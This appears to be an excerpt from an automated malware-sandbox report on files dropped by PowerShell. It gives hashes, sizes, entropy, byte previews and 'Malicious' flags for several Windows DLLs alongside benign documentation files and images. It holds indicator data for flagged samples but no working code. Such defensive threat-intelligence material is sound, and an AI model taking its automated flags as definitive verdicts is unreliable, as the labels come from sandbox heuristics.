    SHA-512:E3F1DB80748333F08F79F735A457246E015C10B353E1A52ABE91ED9A69F7DE5EFA5F78A2ED209E97B16813CB74A87F8F0C63A5F44C8B59583851922F54A48CF5
    Malicious:true
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........A~..A~..A~..H...M~..G...C~..G...L~..G...I~..G...B~......C~......B~..A~..5~......E~......@~....}.@~......@~..RichA~..........PE..d....K.f.........." ...&..................................................... ............`.............................................P...P...................T......../..........`4..T........................... 3..@............ ...............................text...O........................... ..`.rdata..$.... ......................@..@.data...l ..........................@....pdata..T...........................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:data
    Category:dropped
    Size (bytes):125220
    Entropy (8bit):6.927830329526241
    Encrypted:false
    SSDEEP:
    MD5:7E0751762AE08566F876556CC2B92C7E
    SHA1:9FEC1FE8A03C2D5A8D911479EF6C3921189CB051
    SHA-256:1B7CB35EAD7ACE3D87970E01F4D98BE2219CD558E4CF63B1C3F15CEA709F6AB0
    SHA-512:72AF8FDB16EDD846EE67E1FF421E95C3335BE2DC2EC475DA586120B670E105EE9A43EB4666FE7837147C5A17B76C5DC55BC9B012A31C3D4991875B6C29B76CF2
    Malicious:false
    Reputation:unknown
    Preview:0......*.H...........0.......1.0...`.H.e......0...q..+.....7......a0...\0...+.....7........Y...N....".P...240409150154Z0...+.....7.....0....0... .....w.=...7o.............L.w1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .....w.=...7o.............L.w0*...0..{b..M..;@....C^.1.0...+.....7...1...0*....T..|../..IT....Q.1.0...+.....7...1...0*.....'......s..%R=5..1.0...+.....7...1...0*.....2m..3.......N..D1.0...+.....7...1...0... .......V.C.........>..wf...O...1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .......V.C.........>..wf...O...0*.....KG{6.8.o.<v.....1.0...+.....7...1...0... .k.r.....r...K=.w.&.....mY+..1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .k.r.....r...K=.w.&.....mY+..0... .l..x....h......=....'&.ZZGe.7.31i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .l..x....h......=....'&.ZZGe.7.30*....H..J.%....Q..Uhx{;1.0...+.....7...1...0*.........].3.=].[.
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):30488
    Entropy (8bit):6.576230704358061
    Encrypted:false
    SSDEEP:
    MD5:92B440CA45447EC33E884752E4C65B07
    SHA1:5477E21BB511CC33C988140521A4F8C11A427BCC
    SHA-256:680DF34FB908C49410AC5F68A8C05D92858ACD111E62D1194D15BDCE520BD6C3
    SHA-512:40E60E1D1445592C5E8EB352A4052DB28B1739A29E16B884B0BA15917B058E66196988214CE473BA158704837B101A13195D5E48CB1DC2F07262DFECFE8D8191
    Malicious:true
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&.tb..'b..'b..'k.V'`..'d(.&`..'d(.&n..'d(.&j..'d(.&f..'.(.&`..'b..' ..')..&g..'.(.&c..'.(.&c..'.(:'c..'.(.&c..'Richb..'........PE..d....K.f.........." ...&.....2............................................................`..........................................@..L...,A..x....p.......`.......H.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...X....P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B................................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):1540888
    Entropy (8bit):6.584272141791991
    Encrypted:false
    SSDEEP:
    MD5:612FC8A817C5FAA9CB5E89B0D4096216
    SHA1:C8189CBB846F9A77F1AE67F3BD6B71B6363B9562
    SHA-256:7DA1C4604FC97BA033830A2703D92BB6D10A9BBA201EC64D13D5CCBFECD57D49
    SHA-512:8A4A751AF7611651D8D48A894C0D67EB67D5C22557BA4DDD298909DD4FB05F5D010FE785019AF06E6CA2E406753342C54668E9C4E976BAF758EE952834F8A237
    Malicious:true
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........l..l..l...B..l.....l.....l.....l.....l.....l..l..l.....l.....l......l.....l.Rich.l.................PE..d....K.f.........." ...&.....,............................................................`..............................................#...........`..........h....T.../...p..\......T...............................@............@..X............................text....,.......................... ..`.rdata.......@.......2..............@..@.data...PM...0...D..................@....pdata..h............\..............@..@.rsrc........`.......:..............@..@.reloc..\....p.......D..............@..B................................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):1816344
    Entropy (8bit):6.495083998132025
    Encrypted:false
    SSDEEP:
    MD5:21DC82DD9CC445F92E0172D961162222
    SHA1:73BC20B509E1545B16324480D9620AE25364EBF1
    SHA-256:C2966941F116FAB99F48AB9617196B43A5EE2FD94A8C70761BDA56CB334DAA03
    SHA-512:3051A9D723FB7FC11F228E9F27BD2644AC5A0A95E7992D60C757240577B92FC31FA373987B338E6BC5707317D20089DF4B48D1B188225FF370AD2A68D5FF7BA6
    Malicious:true
    Reputation:unknown
    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......1.y+u..xu..xu..x...yw..x...xv..x...yx..x...y}..x...yq..x..yw..x|..xg..x...yt..x...yx..xu..x]..x...y...x...yt..x...xt..x...yt..xRichu..x........................PE..d...1,.c.........." ...!..................................................................`..............................................`.. _..h.......8................/..........................................`...@............0...............................text............................... ..`.rdata..|L...0...N..................@..@.data...."...........f..............@....pdata...............n..............@..@.rsrc...8............f..............@..@.reloc...............j..............@..B................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):1555736
    Entropy (8bit):6.182100088642903
    Encrypted:false
    SSDEEP:
    MD5:9FB68A0252E2B6CD99FD0CB6708C1606
    SHA1:60AB372E8473FAD0F03801B6719BF5CCCFC2592E
    SHA-256:C6FFE2238134478D8CB1C695D57E794516F3790E211FF519F551E335230DE7DE
    SHA-512:F5DE1B1A9DC2D71AE27DFAA7B01E079E4970319B6424B44C47F86360FAF0B976ED49DAB6EE9F811E766A2684B647711E567CBAA6660F53BA82D724441C4DDD06
    Malicious:true
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y.P.=n>.=n>.=n>...?.?n>...;.1n>...:.5n>...=.9n>...:.>n>...:.<n>.4...-n>...?.(n>.=n?.wo>...6..n>...>.<n>.....<n>...<.<n>.Rich=n>.................PE..d...],.c.........." ...!............|.....................................................`..........................................?..L@..,...|........{...P..D......../.......E...T...............................S..@...............@............................text...h........................... ..`.rdata..0...........................@..@.data...............................@....pdata..D....P......................@..@.rsrc....{.......|..................@..@.reloc...E.......F...H..............@..B................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):1137944
    Entropy (8bit):5.462087550450309
    Encrypted:false
    SSDEEP:
    MD5:16BE9A6F941F1A2CB6B5FCA766309B2C
    SHA1:17B23AE0E6A11D5B8159C748073E36A936F3316A
    SHA-256:10FFD5207EEFF5A836B330B237D766365D746C30E01ABF0FD01F78548D1F1B04
    SHA-512:64B7ECC58AE7CF128F03A0D5D5428AAA0D4AD4AE7E7D19BE0EA819BBBF99503836BFE4946DF8EE3AB8A92331FDD002AB9A9DE5146AF3E86FEF789CE46810796B
    Malicious:true
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........aM...#...#...#..x....#.."...#..&...#..'...#.. ...#..."...#..x"...#..."...#.......#...#...#......#...!...#.Rich..#.................PE..d....K.f.........." ...&.>..........\*.......................................p.......Q....`.........................................p...X............P.......@.........../...`......P^..T............................]..@............P..p............................text....=.......>.................. ..`.rdata..\....P.......B..............@..@.data........ ......................@....pdata.......@......................@..@.rsrc........P......."..............@..@.reloc.......`.......,..............@..B........................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Category:dropped
    Size (bytes):30488
    Entropy (8bit):6.443672733968568
    Encrypted:false
    SSDEEP:
    MD5:F4EFDE2CA920A52135B00BF8F0545A87
    SHA1:352E5EA2419BA876FB80E0D0D1E5DD12272A33E4
    SHA-256:9885B3D18903A2EF27428C7C9760493111CC97330FF0AFCB57199964092E86BF
    SHA-512:F098AF2851BE213F83D19C0AA0CA82DED7BC41F51793502B9BED32D185B73B9CC8A9B29E25B3C5847B237AA466B14088E577F05B6BD03046AA65EDB25C087E8D
    Malicious:true
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........N.J. TJ. TJ. TC.TH. TL.!UH. TL.%UA. TL.$UB. TL.#UI. T%.!UH. T..!UM. TJ.!Tp. T%.(UK. T%. UK. T%..TK. T%."UK. TRichJ. T........................PE..d....K.f.........." ...&.....4.......................................................!....`..........................................A..P....B.......p.......`..p....H.../......d....:..T............................9..@............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......4..............@....pdata..p....`.......8..............@..@.rsrc........p.......<..............@..@.reloc..d............F..............@..B................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
    Category:dropped
    Size (bytes):146712
    Entropy (8bit):6.609130019215802
    Encrypted:false
    SSDEEP:
    MD5:297E845DD893E549146AE6826101E64F
    SHA1:6C52876EA6EFB2BC8D630761752DF8C0A79542F1
    SHA-256:837EFB838CB91428C8C0DFB65D5AF1E69823FF1594780EB8C8E9D78F7C4B2FC1
    SHA-512:F6EFEF5E34BA13F1DFDDACFEA15F385DE91D310D73A6894CABB79C2186ACCC186C80CEF7405658D91517C3C10C66E1ACB93E8AD2450D4346F1AA85661B6074C3
    Malicious:true
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...x.Oc..........."...'............P..........A....................................@.....`... ......................................@.......P..8......................../......................................(....................Q..p............................text...............................`..`.data...............................@....rdata...W.......X..................@..@.pdata..............................@..@.xdata....... ......................@..@.bss.........0...........................edata.......@......................@..@.idata..8....P......................@....CRT....X....`......................@....tls.........p......................@....rsrc...............................@....reloc..............................@..B................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):234
    Entropy (8bit):4.83687632821278
    Encrypted:false
    SSDEEP:
    MD5:54949B2EA0EA5154FE0F9F9D2F5814DB
    SHA1:B49EF38E5F36D1570EEC285B233086E868DCFA20
    SHA-256:D33FB8AFE37163056EDF2ABF8C0C701ED104714320FA1BA993B5164BB70AA3E5
    SHA-512:785E8239970710F146DF461D564887A587F23F265C25A269AA97A800084CFC7B484B89A53C3FD831CC8786D3DFCF7ACA814CBB30A39974C254FD763C44FEAD1B
    Malicious:false
    Reputation:unknown
    Preview:# Sphinx build info version 1..# This file hashes the configuration used when building these files. When it is not found, a full rebuild will be done...config: 9a95930adb1ce197ae15cb4c41582c37..tags: 645f666f9bcd5a90fca523b33c5a78b7..
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:Python script, ASCII text executable, with CRLF line terminators
    Category:dropped
    Size (bytes):6036
    Entropy (8bit):4.734990692234277
    Encrypted:false
    SSDEEP:
    MD5:F161D3B3E8CA2C3D55D9B1DD97107FA2
    SHA1:DB3F12B09E223787F8EFF264F820C1097DF7D099
    SHA-256:DEFCCC58D87DBD6207906F80DEB9AD29ED15B0DF588CBFCB180D6B9369E5F8B0
    SHA-512:17F14EF1D696F89BFD8F814F88014CE4FC6FCCA904450D2466D9D830CE74599F761AA6374D27E2DB9A2A2FFBB6A38DB5291685B68D7A65901B13AF5767843366
    Malicious:false
    Reputation:unknown
    Preview:from datetime import tzinfo, timedelta, datetime....ZERO = timedelta(0)..HOUR = timedelta(hours=1)..SECOND = timedelta(seconds=1)....# A class capturing the platform's idea of local time...# (May result in wrong values on historical times in..# timezones where UTC offset and/or the DST rules had..# changed in the past.)..import time as _time....STDOFFSET = timedelta(seconds = -_time.timezone)..if _time.daylight:.. DSTOFFSET = timedelta(seconds = -_time.altzone)..else:.. DSTOFFSET = STDOFFSET....DSTDIFF = DSTOFFSET - STDOFFSET....class LocalTimezone(tzinfo):.... def fromutc(self, dt):.. assert dt.tzinfo is self.. stamp = (dt - datetime(1970, 1, 1, tzinfo=self)) // SECOND.. args = _time.localtime(stamp)[:6].. dst_diff = DSTDIFF // SECOND.. # Detect fold.. fold = (args == _time.localtime(stamp - dst_diff)).. return datetime(*args, microsecond=dt.microsecond,.. tzinfo=self, fold=fold).... def utcoffset(se
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PNG image data, 500 x 320, 8-bit colormap, non-interlaced
    Category:dropped
    Size (bytes):11070
    Entropy (8bit):7.946023445243204
    Encrypted:false
    SSDEEP:
    MD5:A31E9697FC75139B17480D716A80ABA4
    SHA1:F94BF8128D57C0610A6ACD69AD4D56F839EDA01F
    SHA-256:382828D64E88644E47E695D717EA8432EC1EF79A17F2D209B11AEF4FDBFA4BF5
    SHA-512:A592706045236F3ED27D38C5DDF40BD087428DFC158C5E531CB00EF7AAC9C2F7F78CFCE870F0C8971D71AF129D5FB716D6BE2C1B28CD69282F048A34D1B38643
    Malicious:false
    Reputation:unknown
    Preview:.PNG........IHDR.......@.....}S~.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...mPLTE.............:}.......k........j.&q.................................................{......................................t............................................b..?o.4d.<k.X.................8h.Ar.6f..................T..>m.Dt.U.....5e............:k.h..p..r..e..\..Iy........................3d.Dx.........{....a..w..r..t..o....Y..`spwr..ZkK,P.)M.,G7.3.t..@V.w)V..[.y.e@yfoVGv.c..&^.v~.u|.......mpf...*Pn3:8qrppjmtx~4H,3f.ZR.`....k|y.GesFl.....Ms.:0BA@...... !WbV...............hj`.J.s..^S.HI%Mfb7f...........YGx...u..i..~...v..~.W...1X.\....joJ.W2H...&@.......T....5].......6\.(F.....su.....bKGD....H....tIME.........,...'.IDATx.._......XG....X..)/.(..nq.......@.h=.V$..-...t.Bk.R ..|i.....{.....s_.....d.B2Q..$..|:].kMf.w.~.5k(J....T`k.V.V..gP.z.Q_...)B=.gnxk...b..7lP..',W.G_...6....+E=s....wBt......N...u..U..........;!...wW..'DW 2#@'...lP
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PNG image data, 2832 x 1851, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):315150
    Entropy (8bit):7.563998966428142
    Encrypted:false
    SSDEEP:
    MD5:1FC09C1924C3A39F4937B62D8CA139B4
    SHA1:D30ABCDBCE8FC51828AB627CDC5E9E1E1DAC9B87
    SHA-256:B669BED8B4B1D4672F6772C0B63C2C70678DD330C4E7DB576C55BCB319B8865B
    SHA-512:D486EC9061D1647111362142B8CF3F00F7F496B136497C2203155CBEFE874ABB1A32633C29630F5C65F2F17921C864C626E0A4E7BD223DD36B440864D2EDD895
    Malicious:false
    Reputation:unknown
    Preview:.PNG........IHDR.......;........^....sRGB.........eXIfMM.*.............................J...........R.(...........i.........Z.......J.......J.........................................;....'}......pHYs..2...2..(dZ...@.IDATx......U....";..*..(......".....E.L.D..'.&:b&&:f..i..U.E\p..D.Pqc.d_d.Y.>....U..nq.-x...{.*...G..-.|W.6..P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@....c.6.......m;=....P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P...\.t...w.....iA.../..Tla_W@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@.V/..w.._.>|......{...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P.n...x..}.F....~.7.z...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P...|...G..it4...%r...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@..Z.........m.....P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P.V...k%i?.(....(....(....(....(....(....(....(....(....(........:8H.Q...P@
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PNG image data, 955 x 758, 8-bit colormap, non-interlaced
    Category:dropped
    Size (bytes):21907
    Entropy (8bit):7.912374033687615
    Encrypted:false
    SSDEEP:
    MD5:D69005A3C3EE464C7C68E7BCF5012682
    SHA1:2B17E0E96AACCF6722EF75281663BB715BA9ADAF
    SHA-256:70D752F336A9EE7AF4A56B8E5B3696B962B69793B274F76439165823C69CF5E0
    SHA-512:178DA406781A067DEB6DB01CA87886CF5981A528DEF019F8EDABB8372D44FA1E31CC8F410ACB586529A877400F9F3D59427789E4F61615FF87411FE074258DC7
    Malicious:false
    Reputation:unknown
    Preview:.PNG........IHDR...............q.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTE..........@@@ppp......... ...............XXX..........................<<<QQQ%%%...ttt...ccc.......................P..Y..QQ1<<$...s...%%.ttF..z.....b..jcc;.......................???...PPP000888...HHH......(((......hhhxxx```............wwwAAA]]]***...NNN{{{......:::...---RRR...>>>...TTTGGG............kkk&&&zzz...ooo...!!!111.........222eee...SSS===......___......$$$.........CCC444..."""[[[sss'''........bKGD....H....tIME.........M...R.IDATx....#K.....[...uW.Z......E.y.ln.~}....3{8.r.. .$.............%.......|>[{.*..V...ZUk.@.[........e.....`.. .v...w.....]..:".d.j.....mwv..7...}N5]''..T[t...].]...w....F|c.Kv..oj~M.KvyS.T..g.Nv....O.K....q..k....w...]....d.....$.d.75.g..1..Z.+..M.W...k{.....&....\.3..kn).a.j.h.E...`.H....M.k..fn..b..P=.].Kvk..4..E..m....sd.{...F"...:'.N$vp..EcT....8..H4:.Z/").X.X.D.f...uZ....3...i..u9.r.AP...'...*...r..<...>aWCx;...|y.....w&
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PNG image data, 538 x 319, 8-bit colormap, non-interlaced
    Category:dropped
    Size (bytes):6431
    Entropy (8bit):7.725801858557267
    Encrypted:false
    SSDEEP:
    MD5:E422B7E296E99FD5875644DA110F0ECE
    SHA1:57C6717DA7EA3D0CCD93765FD7B26A0FC1E81007
    SHA-256:4BD5DB0B21F178FD8B16F7D999D0DA20A00CA8D271CD556CFB1D26DEA91AAC88
    SHA-512:84FB37C554F9F8801040E6729DB269060C067A0669F561D68852B316521F2F9A699A6CF3F219E51566318AB55FC0E46A2BE3A1D70129AC291C2165C288843BD0
    Malicious:false
    Reputation:unknown
    Preview:.PNG........IHDR.......?.....7.....[PLTE..................................................................................................................................................................................................................'''................................................>>>....................."""......................................................,,,........................222............................................................ $$$(((,,,000444888<<<@@@DDDHHHLLLPPPTTTXXX\\\```dddhhhlllppptttxxx|||...................................................................................................f..%....tRNS......... $'(,048<@CGKOSW[_acdghjkoqstw{................................................................................................./].....IDATx.......A.q...B.6M.|!.V.$m.k..4m.-..t..H.A.l.6.y,..c0x...l.......%.Y......,~....8..H......H.....s....RJ)..RJ)..RJ)..RJ)..RJ)..RJ)..RJ)..RJ)..RJ)..RJ.u.zc...y^%...nk...h..h..h..h(.P..DC..
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PNG image data, 978 x 175, 8-bit/color RGB, non-interlaced
    Category:dropped
    Size (bytes):14979
    Entropy (8bit):7.907484756754295
    Encrypted:false
    SSDEEP:
    MD5:92E760BA94011039696672615A8FFBC6
    SHA1:B6A1BDCE450A251D1AB46BC7EEF2970E158761F6
    SHA-256:B21A9EA9AD785299A282CCCC4B9A93CF9B1F028F65B0E90C0C41DEEA019953BE
    SHA-512:95528E1D62C27F704FCB0E305A10F2CE1364A0A4A5A66D72E1424957E31D77B1D5C58997C5543273B6AD528D29D1120C665EDCAE8142AC7FDB9FFD947DF59AE0
    Malicious:false
    Reputation:unknown
    Preview:.PNG........IHDR...............q.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............pHYs..........o.d..9.IDATx...{|T.?..s.3........ ...j+...UhC....X.n....nm....U${.Y.....Z.1hk......!@HB..I2..\~..d.$..7K2....N&g2.s..s...9.....j.)...."...[.1..............~.!.0|..~...o.......?F..,.".+.[J.....'.....`3.f.R.....#,../5M......Tb.#...G.;..Zx..........~G.;."...................iw8.F....n..j.w....#.!.0.*.pV.iZ8........Q.J!.o....Rm.....@DF8..X.s'Z0v.c.?.i]..w..-Tb.#...g.[.k........".C)....}..._!.........B.QAA..2v....b...0.;..3..A...$j...#..w...w.n8.L.Q.#.d!g..E."Xl.X...Y.#...!.b'...B!.4....u=...J. ....[..i.=.h..>.$.d..;w.....r..S..C....y.Xl.....j.s..v.&..`.1AH...P`.!./.1VD..9.yx~G.4)e....97B.Fp......w.@4S,..g&..1..@../|.C..".H..Q...eE~i/.F.. . ..@8..4..%..b9..4.>.$|)..@.b...g%..v.D...c@...9..6re....#] <.J).~..@.. !...^V...8h...I...;..E.....\AD.....'vS.;e!.`dw.{f.s....b...9.....X..........W.s.(.,.FhA.u....6.A..,........;CA..'...
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PNG image data, 250 x 250, 8-bit/color RGB, non-interlaced
    Category:dropped
    Size (bytes):33808
    Entropy (8bit):7.9845728693968825
    Encrypted:false
    SSDEEP:
    MD5:9B1263DB04E6421E7032CFED2001A5D3
    SHA1:5EF1092FDE20E8251CC9592E37B9F22F9F4E87C3
    SHA-256:B5528A56A8B0F2E5DA3D6F20F47057CC0325273FF152816C202F8A114CD07138
    SHA-512:E3D6F048380D724A3671817C128E96CFD27ECA14C4C84D88655044E5A37D3C9635DEF1D518F7C6BCC51C0EEEC9F99F8A28E3E4B179ACC05269E8EB0F99E7F826
    Malicious:false
    Reputation:unknown
    Preview:.PNG........IHDR................j....iCCPICC Profile..x..gTS....9.@..zG.t)....l.$@(1.....T`,...:.C......... X....A@...XP.'pA.]w..?wg..~........@.g......I.TQ..3cYD$...`.2..h@fsR......m..@..}#q..L...i./........).$.."....R..;..+#U.0..a...@.O.9v....=.}.9!A.H.8.x2.-........X..Y.a.../@..a.N....v......Y....N...fG/.d.c.x. w".v.....f/..CRb.._....dA...l..>.e.z.0q..fu. 4x^.D...s..=h....?p@.....7....:.l/........sJz..<g...3.....Y.:?...5..k.L D~..........$.F.<.+2."Z.l.. ..[..-..k..D..T..y.y....cl.0315...o..;.[......k.3..."......+.g...d.]S.......4Q.\=.x.."..2@...........v..../..B@.X.8 ..s...Y`....`7..J..P...Ip.4...*......<..`....`.LC...(....T!-..2..!......(....P...m..B..:..@.A..-..z..Bc.[.3......k.ak..{.!.J8.N.3..x'\...'...*|.~.....I.@.Pt....e.rA.."Q1(.j#*.U.*G..Q.....8.......h#.............t5......DO..a(.%......,..b20.."L%...:.!f.3..b.X...........`.a.-.n..v......p.8..........].....>.IxU.........E.....{...4A..E.%....u.].c.f.].0a.(M.!..C...-.bb..:....D"..lH.
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PNG image data, 706 x 449, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):84383
    Entropy (8bit):7.964768426071419
    Encrypted:false
    SSDEEP:
    MD5:7114029B0D94D2852D9E6DDF0E909C2B
    SHA1:B91383E188398914ECBC306FD1A23E26D5118FF9
    SHA-256:BA9ABF87CADFFA7027CA298BA11CEB6418F3A9ABB32AC988C8D342E7C2B3FB2E
    SHA-512:5ABE7D97E38E0419E0D5B3505F46871682886A0E7701724A73A1D451B1202327DB6CA0EFF8CB99D653E319DB8F2B46A1057029627E23100FF81EBD5755E37D73
    Malicious:false
    Reputation:unknown
    Preview:.PNG........IHDR.............cn......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............pHYs..........o.d....IDATx...wt\......{}.k..s....k...z<AR..A....Pq.g..H3....:.Mv..R+tnt`...9.`..3.A"....:.r!<..{...s.T@"A.}...@.S'...s...5.jFz.X,...b.X..UaT.\...b.X,....#.......<x......!......r;........<x...c.cHp<, <@.-.#.....<x........j.y.0<......._x.......<x.....UA.@.J........../x.......<x.(3..X..K.q.0\-..r.....C....<x.........Qp...U..U.. \.(............<x...C.:+..c........*!8.....0...6.w.<x.......<...b..K.q5.pI....+.............<x.....6......s.... 8.............<x.......<xD...0..~. ....a8..+D". X'r.~....r..r...<x.......7....../.?.....@....a......Q..{r..@..?...........?........<x.......<xhCg.?..IpL...h.q%.......J.L...K..G...........?......."......<x.....6....d......._E.%...@..H..i.......z...C..........jjj.{MM..#......<x......C...q......4@.?%...i....J..b......rC..#.<..<x.......<FjH..`8....+\..+....B..>9<x.......<F....t..(....*a.".... L...w..
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):16018
    Entropy (8bit):4.801847554025832
    Encrypted:false
    SSDEEP:
    MD5:CB95906BC97133CE646BC7BFB1119A5C
    SHA1:6B5620D53347075F849736D7D3594573589162A9
    SHA-256:5251A8124C61A4B37AA0A7DC2DED6422E0E8296F854F6D5FA59B8A8DE2A6E5D9
    SHA-512:2E992E4AD916EE7B17454A700EE0892AA224932079F70D79F8F43B197F9FA71ADB2FCFCB26AB5F7209078587E3BB58D07A1EE99319BEA90B6951A649877A72A5
    Malicious:false
    Reputation:unknown
    Preview:/*.. * basic.css.. * ~~~~~~~~~.. *.. * Sphinx stylesheet -- basic theme... *.. * :copyright: Copyright 2007-2023 by the Sphinx team, see AUTHORS... * :license: BSD, see LICENSE for details... *.. */..../* -- main layout ----------------------------------------------------------- */....div.clearer {.. clear: both;..}....div.section::after {.. display: block;.. content: '';.. clear: left;..}..../* -- relbar ---------------------------------------------------------------- */....div.related {.. width: 100%;.. font-size: 90%;..}....div.related h3 {.. display: none;..}....div.related ul {.. margin: 0;.. padding: 0 0 0 10px;.. list-style: none;..}....div.related li {.. display: inline;..}....div.related li.right {.. float: right;.. margin-right: 5px;..}..../* -- sidebar --------------------------------------------------------------- */....div.sphinxsidebarwrapper {.. padding: 10px 5px 0 10px;..}....div.sphinxsidebar {.. float: left;.. width: 230
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):1976
    Entropy (8bit):4.644530815662487
    Encrypted:false
    SSDEEP:
    MD5:B75610C76C03CB7E3F1C47ED9AECB54E
    SHA1:444C7F390FA904085C8E85642240473E45E79D61
    SHA-256:5CAEFAA11B03B3A7451FD521A841272B9C670AE333C53D265151E65CD647483C
    SHA-512:2CA688C7BA1875E54171566BDE3B735408124D1246BE4C1BC8E02DD76E26E608514FBF79C096E01BB11D5F548ABBBAF1A519BDFD2B91AE3D4BD884D5AEBED7D3
    Malicious:false
    Reputation:unknown
    Preview:document.addEventListener("DOMContentLoaded", function () {.. // add the search form and bind the events.. document.. .querySelector("h1").. .insertAdjacentHTML(.. "afterend",.. [.. "<p>Filter entries by content:",.. '<input type="text" value="" id="searchbox" style="width: 50%">',.. '<input type="submit" id="searchbox-submit" value="Filter"></p>',.. ].join("\n"),.. );.... function doFilter() {.. let query;.. try {.. query = new RegExp(document.querySelector("#searchbox").value, "i");.. } catch (e) {.. return; // not a valid regex (yet).. }.. // find headers for the versions (What's new in Python X.Y.Z?).. const h2s = document.querySelectorAll("#changelog h2");.. for (const h2 of h2s) {.. let sections_found = 0;.. // find headers for the sections (Core, Library, etc.).. const h3s = h2.parentNode.querySelectorAll("h3");.. for (const h3 of h3s) {.. let entries_found = 0;.. //
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):5744
    Entropy (8bit):4.963403524057622
    Encrypted:false
    SSDEEP:
    MD5:60F6A7572281531726D2174C47CA3938
    SHA1:280575B81AF62CB70F115A149C44F83CB825A8E4
    SHA-256:22FE227926A455195858421E5D0DC6FB5F22717F38267E8E5CA323502870098E
    SHA-512:D1710F6B55AD0F037BBA8B88195401435BD43D12A4BB068E631FFA435021C27D1A254D6B3E92450549DCC8C40D1900FF5B99616316BD447B6E1BDA791828F19F
    Malicious:false
    Reputation:unknown
